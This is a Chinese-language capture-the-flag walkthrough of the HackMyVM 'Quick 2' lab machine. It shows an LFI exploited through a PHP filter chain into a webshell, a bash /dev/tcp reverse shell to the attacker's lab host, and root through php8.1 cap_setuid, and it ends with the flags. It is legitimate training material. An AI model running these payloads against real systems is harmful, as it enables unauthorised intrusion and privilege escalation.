[HackMyVM]Quick 2

kali:192.168.56.104

主机发现

arp-scan -l

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:da:38:98       PCS Systemtechnik GmbH
192.168.56.116  08:00:27:f8:cc:57       PCS Systemtechnik GmbH

靶机:192.168.56.116

端口扫描

nmap  192.168.56.116

# nmap  192.168.56.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 13:33 CST
Nmap scan report for 192.168.56.116
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

开启了 22 80端口

先看web

打开发现url可以包含文件

http://192.168.56.116/index.php?page=home.php

尝试包含/etc/passwd

http://192.168.56.116/index.php?page=/etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin pollinate:x:105:1::/var/cache/pollinate:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin syslog:x:107:113::/home/syslog:/usr/sbin/nologin uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin andrew:x:1000:1000:Andrew Speed:/home/andrew:/bin/bash lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false nick:x:1001:1001:Nick Greenhorn,,,:/home/nick:/bin/bash

成功包含

但是不能有filter过滤没法用php链getshell

扫一下目录

gobuster dir -u http://192.168.56.116 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt

/about.php            (Status: 200) [Size: 1446]
/cars.php             (Status: 200) [Size: 1502]
/contact.php          (Status: 200) [Size: 1395]
/connect.php          (Status: 500) [Size: 0]
/file.php             (Status: 200) [Size: 200]
/home.php             (Status: 200) [Size: 2539]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.116/images/]
/index.php            (Status: 200) [Size: 3825]
/index.php            (Status: 200) [Size: 3825]
/news.php             (Status: 200) [Size: 560]
/server-status        (Status: 403) [Size: 279]

在file.php可以本地文件包含，并且可以使用filter

根据昨天靶场的经验用php_filter_chain_generator.py，而且不用二次编码绕过

 python .\php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

反弹shell，nc不行，用bash

0=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261'

拿到shell

# nc -lvnp 4567       
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.116] 36076
bash: cannot set terminal process group (743): Inappropriate ioctl for device
bash: no job control in this shell
www-data@quick2:/var/www/html$ whoami
whoami
www-data

在nick目录下拿到user.txt

www-data@quick2:/home/nick$ cat user.txt
cat user.txt:'#######::'##::::'##:'####::'######::'##:::'##:::::'#######::'##.... ##: ##:::: ##:. ##::'##... ##: ##::'##:::::'##.... ##:##:::: ##: ##:::: ##:: ##:: ##:::..:: ##:'##::::::..::::: ##:##:::: ##: ##:::: ##:: ##:: ##::::::: #####::::::::'#######::##:'## ##: ##:::: ##:: ##:: ##::::::: ##. ##::::::'##::::::::##:.. ##:: ##:::: ##:: ##:: ##::: ##: ##:. ##::::: ##::::::::: ##### ##:. #######::'####:. ######:: ##::. ##:::: #########::.....:..:::.......:::....:::......:::..::::..:::::.........::⣀⣀⣀⣀⣠⣤⣤⣤⠶⠶⠶⢦⣤⣤⣤⣄⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣤⠤⠤⠤⢤⣤⣤⣤⣤⣄⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣟⠛⠿⢭⣛⣉⠉⠉⠉⠉⠉⠉⠙⢿⡁⠀⠀⠉⠉⠉⠉⠛⣦⠤⠖⠒⠚⠛⠛⠛⠛⠛⢓⣶⠶⠖⠚⠉⢙⣁⣭⠭⠿⠛⠛⠛⠻⢶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢽⣄⢀⣠⡴⠛⠉⠉⠉⠉⠻⡗⠚⢻⡇⠀⠀⠀⠀⠀⣠⡴⠋⠀⠀⠀⠀⠀⢀⣠⠴⠚⠉⠀⠤⢤⡶⠊⠉⠀⠹⡄⠀⠀⠀⠀⠀⠀⠉⠻⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠀⠀⠀⠀⢀⣤⣴⣾⣥⣶⡾⣷⣀⣀⣠⣴⣿⠥⠤⣄⣀⣀⣀⡤⠖⠉⠀⠀⠀⠀⠀⠀⡜⠀⠀⠀⠀⠀⢹⣄⣀⣀⣀⣀⣀⣀⣀⣀⣹⣿⣶⣶⣤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠟⠻⠯⠥⣄⣄⣿⠓⠛⡛⢉⣭⣤⣤⣤⠤⠴⠚⠛⠁⠀⠀⠀⠈⠉⠉⠉⠉⠙⠛⠉⠉⠉⠉⠉⠉⣿⡁⠀⠀⠀⠀⢀⣀⣀⣀⣀⣉⣧⣀⢉⡽⠛⠛⢳⣦⡄⠀⠀⠀⠀⠀⢰⡿⣄⡀⠀⠀⠀⠀⢉⣹⡿⢻⣿⠿⣿⣇⡉⣑⣦⣀⣀⣀⡤⠤⠤⣤⣤⡶⠶⠶⠶⠷⠶⢾⣉⠉⠉⠉⠙⡏⠉⠉⠉⠉⠉⠉⠁⠀⠀⠈⢹⢻⣿⠇⠀⣴⣿⣿⣿⣿⠀⠀⠀⢠⡿⠀⠀⠉⠉⠙⠒⣶⡟⢉⣿⡿⠁⠀⢸⣿⠋⠉⣿⠀⠀⠀⢀⡤⠞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠲⡄⠀⠸⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡟⠀⢰⣿⣿⣿⣿⢻⠀⠀⠀⢸⡷⣦⣀⡀⠀⠀⠘⢿⣧⠞⢫⣷⣄⣠⠏⣸⠀⠀⡏⠀⢀⡴⠋⠀⠀⠀⠀⠀⢀⣴⣶⣶⣶⡦⣄⡀⠀⠈⢦⠀⢧⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⡿⠀⠀⣿⣿⣿⣾⣿⣴⠀⠀⠀⢸⣷⡇⠀⠉⠑⣶⠀⠀⠀⠀⠀⠉⠉⠀⠐⡇⠀⢸⡇⣠⠟⠀⠀⠀⠀⠀⣠⣾⣿⡟⢀⣽⣧⡹⣟⣷⡀⠀⠈⣧⠸⡄⠀⠀⠀⠀⢀⣀⣠⣼⣿⠃⠀⢀⡇⠻⣿⣿⠟⠛⠀⠀⠀⢸⡿⢷⣄⡀⢀⡇⠀⣀⣀⣀⣀⣀⣀⠀⢀⠇⠀⠈⢻⡟⠲⢶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⠟⢷⢸⣹⣷⠀⠀⠘⣆⣧⣠⢤⣶⣾⣿⣿⣷⣿⣿⠤⠴⠚⠉⠉⠉⠁⠀⠀⠀⠀⠀⢸⣿⣦⣍⡛⠻⠃⡜⠉⠉⠀⠈⠉⢹⡆⢸⠀⠀⠀⠈⢧⡀⠀⠀⢀⡝⢉⣿⣿⣿⣿⣿⣅⡀⣸⢻⢿⣿⠀⠀⠀⢹⡿⢷⣾⡿⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⣿⣿⢿⣿⣷⣶⣧⣄⣀⣀⠀⠀⢸⡇⢸⠀⠀⠀⠀⠀⠉⠑⠲⡞⠀⠀⣿⣿⣿⡿⠿⣿⣿⠇⣼⡾⣹⠀⠀⣀⠼⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢶⣭⣛⣻⣿⣷⡾⢿⣿⣿⣿⣷⣿⡦⠤⣤⣤⣀⣀⣠⣼⡇⠀⠀⠹⣿⣿⣿⠀⡨⢏⣼⣿⣧⣧⠴⠊⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠻⢯⣉⠙⣷⣼⣿⣇⣳⣿⠈⢧⠀⠸⣄⡰⠋⠀⠀⣧⣄⡀⠀⠈⠻⠽⢯⣿⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠛⠿⠿⠿⢧⣬⣷⣶⣞⣁⣤⣤⣤⡵⠀⠉⠙⠒⠒⠛⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀HMV{Its-gonna-be-a-fast-ride}

之后就是翻目录找提取文件

愣是没找到

网段进程也看了没有什么东西

内核也没什么东西

借助linpeas扫一下

══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                                                                                                                                   
Current env capabilities:                                                                                                                                                                                                                                                                         
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000Parent Shell capabilities:
0x0000000000000000=Files with capabilities (limited to 50):
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/php8.1 cap_setuid=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep

在capabilities里面发现/usr/bin/php8.1 cap_setuid=ep

php8.1可以进行capabilities提权

参考exp

/usr/bin/php8.1 -r "posix_setuid(0); system('/bin/sh');"

www-data@quick2:/tmp$ /usr/bin/php8.1 -r "posix_setuid(0); system('/bin/sh');"
<bin/php8.1 -r "posix_setuid(0); system('/bin/sh');"
whoami
root

直接拿到root权限，然后拿到flag

cat /root/r*:'#######::'##::::'##:'####::'######::'##:::'##:::::'#######::'##.... ##: ##:::: ##:. ##::'##... ##: ##::'##:::::'##.... ##:##:::: ##: ##:::: ##:: ##:: ##:::..:: ##:'##::::::..::::: ##:##:::: ##: ##:::: ##:: ##:: ##::::::: #####::::::::'#######::##:'## ##: ##:::: ##:: ##:: ##::::::: ##. ##::::::'##::::::::##:.. ##:: ##:::: ##:: ##:: ##::: ##: ##:. ##::::: ##::::::::: ##### ##:. #######::'####:. ######:: ##::. ##:::: #########::.....:..:::.......:::....:::......:::..::::..:::::.........::⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⣤⣤⣤⢶⠶⣶⢲⣒⢓⠛⠛⣋⣉⣉⣉⣉⣉⣉⣉⣍⣭⣹⣭⣏⣝⣩⣙⣋⣿⣿⠿⢿⣿⣿⣿⣿⣶⣶⣷⣾⣶⣦⣤⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⣴⣶⡶⠟⠛⠋⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠈⠀⠉⠈⠈⠀⠁⠀⠉⠈⢉⣽⠟⣉⣴⣶⣿⣿⣿⣿⠿⡿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣦⣤⣄⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣾⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⠟⣱⣿⣿⠿⠋⠉⠀⠀⠀⠀⠀⠄⢀⠹⣿⡟⢶⡝⣶⡙⠳⣯⡙⠻⣷⣭⣛⡿⠿⣶⣶⣤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⣤⣴⣾⡿⠿⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⠁⢠⣿⣿⣧⠀⠀⠀⣠⡴⠶⠶⠶⠶⠦⢤⣄⡹⣦⠹⣦⢙⣶⣼⣷⠶⠟⠻⠿⠿⣶⣼⣭⣿⠾⠉⠙⡛⣶⣦⣤⣀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣼⣿⣿⣻⡿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣶⠟⠀⣰⣿⠏⠘⣿⣧⠀⣾⡁⠀⠀⠀⠐⠀⠠⢤⣼⣇⣹⣷⢾⠛⠋⠉⠀⠀⠀⠀⠀⠠⣤⣼⣷⣶⡶⠾⠛⠛⠛⠛⠉⠛⠛⠶⣦⣀⡀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⣤⣴⣶⣶⣶⣶⣿⣿⣿⣟⣛⡓⠲⢶⣦⣤⣤⣤⣤⣶⣶⣶⣶⢶⣶⣶⣶⠶⠲⣖⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⢶⣶⣶⣶⣶⣶⡶⠶⠾⠿⠃⠀⣰⣿⣋⣀⡀⠈⢿⣷⢸⡟⣶⡶⣶⣶⣶⡿⠿⠛⠉⠁⠀⢀⡀⣀⣀⣤⣶⡶⣶⣿⣿⣟⣉⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠁⢿⣿⡆⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⠾⣻⣽⠟⠋⠁⠀⠛⠋⠉⢁⢀⣄⣤⠿⠟⠛⠳⠞⢛⢻⣾⠿⠟⠛⠛⠛⠛⠛⠛⠛⣻⡿⠟⠛⠉⠉⢋⣩⣴⣾⡿⣫⣿⡿⠶⠟⠋⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠷⠾⣿⣿⣷⠸⣟⠉⠋⠀⢀⠀⣤⣤⣶⠶⠾⠛⣿⣿⡿⠍⣷⡾⠛⠉⠉⠉⠛⣶⢦⣄⡀⠀⠀⢀⣴⢿⡛⠻⢶⡀⣿⣅⠠
⠂⠐⠀⠀⠂⠀⢀⣴⣿⣿⢁⣽⠋⠀⠀⠀⠀⠀⢀⣠⣼⠞⠛⠉⠀⠄⠀⣀⣤⡶⠛⠉⠁⠀⠀⠀⠀⠀⠀⣀⣴⠞⠋⠀⠀⣀⣤⣶⣿⣿⡿⠿⠛⣙⣃⣤⡴⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡴⠾⠛⠷⢾⣄⠀⢩⣿⠉⢻⣿⣤⣴⠿⠞⠛⠉⠁⠀⠀⠀⠀⠉⠁⠀⠀⣾⠁⠀⠀⠀⠀⢠⡿⠀⠈⠙⠳⣤⡾⣹⣶⣶⣄⠈⣿⣿⣧⢀
⠅⠠⠀⠁⢀⣰⣿⣿⣿⢷⣿⠁⠀⠀⠈⢀⣠⡾⠛⠉⠀⠀⠀⠈⢀⣠⠾⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠋⠄⠀⣀⣴⣾⣿⣿⣿⣿⣷⡟⠚⢛⣫⠟⠋⠀⠀⠀⠀⠀⠀⠀⢀⣀⣰⡿⠋⢠⣀⣀⠀⠀⠙⣧⣾⣿⠷⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⡿⠀⠀⠀⠀⠀⣾⠃⠀⠀⠀⢀⣿⣿⣿⢿⣸⢻⣷⡿⣿⣏⢸
⠀⠐⠀⣰⣿⣿⣿⣿⣿⣿⣃⡀⢀⣤⢞⠋⠁⠀⠀⠀⠀⡀⣤⡶⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠋⣀⣀⣴⡟⠛⠉⠉⠉⣿⣿⣱⣿⣤⡴⠛⠁⠀⢀⣀⣠⣤⣤⡶⠶⠟⠛⢻⡟⠂⣼⠿⡟⣿⠳⣦⠀⢹⣯⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⠃⠀⠀⠀⠀⢲⡟⠀⠀⠀⢀⣿⣿⣿⣿⣿⣏⣿⣹⣿⣿⣿⢘
⠀⢠⣶⣿⣿⡿⢿⣿⠯⠀⣹⡿⠛⠛⠛⠛⠷⠶⣶⣾⣿⠟⠻⠶⠶⠶⠶⠶⠶⠶⠶⠶⠟⠻⣿⣿⠛⠉⠉⠉⠙⢷⣄⣀⣠⣴⣿⣻⣽⣿⠭⠶⠞⠛⡋⣭⣭⣍⣀⣧⡌⠀⠀⣰⡿⠉⣼⣧⣘⣇⢹⣠⣿⣧⠀⣿⣽⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡟⠀⠀⠀⠀⢀⣿⠃⠀⠀⢠⣾⣿⣿⣿⡿⣿⡿⠛⠋⣿⣿⡏⠀
⠀⣸⣿⠄⠀⢠⣾⢃⣠⡿⠋⠀⠀⠀⠄⠀⠀⢰⣿⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠃⠀⠀⣀⣤⡴⠞⠛⠉⠹⠫⣯⣽⣿⣯⣦⡴⠶⠞⠛⠛⠛⠉⠉⠋⣷⣶⣶⣿⣿⣥⣲⡇⠈⢻⣿⣿⡟⣠⡿⡇⢻⢼⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡿⠀⠀⠀⠀⢠⣿⣏⣀⠀⠀⣼⡿⣿⢸⣿⡇⠸⣧⣴⡾⢿⣿⡷⠀
⠀⢹⣿⣳⣶⣼⣗⣸⣷⠶⣦⣤⣀⣀⣀⡀⢰⡟⠁⢀⣀⣀⣀⣀⣀⣀⣠⣀⣤⣤⣤⣾⣟⣅⣤⣶⣿⢯⠶⠶⡶⣖⡻⣿⣿⣿⣯⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠀⣸⣟⢹⣿⠻⣦⣸⣿⡻⣿⣿⣀⣷⢸⣺⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣤⠖⣿⣇⣀⣀⣤⠞⠛⠁⠈⠍⠛⢺⣿⣶⡏⢸⡿⣧⢠⡟⠛⠻⣾⣿⡏⠀
⠀⢸⣿⠀⡀⠈⠙⠻⢿⣧⠀⠀⠀⠉⠉⠉⠛⠙⠋⠉⠉⠉⠉⠉⠉⠉⠁⠈⢀⠀⢹⡟⠛⣯⣽⣦⡷⠶⠶⠟⠛⠛⠉⠉⠉⢿⡉⠳⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡧⢸⣿⠀⣽⣿⣿⣿⣿⠁⠉⣿⣾⣿⡇⠀⠀⠀⢀⣠⣤⣶⣶⣿⣿⣿⣿⠷⠿⠟⠛⠛⠉⠀⠀⠀⠀⠈⠀⠀⠀⣿⢹⡇⢸⣷⣿⣿⢿⣦⡀⣿⣿⠂⠀
⠀⢸⣿⡀⠇⡍⢠⢀⠀⠈⢷⡄⠀⠀⠀⠀⠀⠀⠀⠐⠈⠀⠀⠀⠀⠀⠀⠀⠀⠆⢸⣗⢰⣿⠀⢹⡄⠀⠀⠀⠀⠀⠐⠀⠀⠘⢷⡄⠙⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣹⠁⢸⢿⡞⠋⢙⣿⣡⣾⣿⠉⣿⣿⣿⣷⣶⣿⣿⠿⠿⠛⠋⠉⠉⠁⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⢸⡇⠘⢿⣿⣿⡌⣿⣹⣿⡏⠀⠀
⠀⢸⣿⣇⡆⠀⠐⠈⠀⣀⣾⣻⣶⣶⣶⣶⣶⣶⣶⣶⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣼⣿⠛⠻⣆⠈⢷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡄⠀⠹⢦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠀⠈⣾⣇⣠⣾⣿⣻⣇⠘⣷⣿⣿⠋⢿⡿⣿⣶⣶⣶⣶⣶⣶⣶⣶⣦⣤⣤⣤⣤⣤⣠⣀⡀⣀⣀⣀⣀⣠⣤⣾⣿⣿⠇⠀⠈⢿⣧⣿⣾⣟⡿⠀⠀⠀
⠀⢸⣿⡍⠟⠷⠶⣤⣼⣿⣿⠿⠿⠿⠿⠿⠿⢿⢿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠙⣧⡀⠙⢶⣶⣶⣿⣟⣿⣟⣟⣚⣓⣿⣤⡼⠿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠀⠀⠀⢿⡉⢀⡟⢸⡟⣿⣿⣿⡏⠀⠈⣷⣤⣤⣽⣿⣿⣿⣿⡿⠿⠿⠿⠿⠿⠟⠛⠛⠛⠛⠙⠙⠉⠉⠉⠉⠿⢯⣌⣀⣀⣀⣀⣉⣿⣽⡿⠁⠀⠀⠀
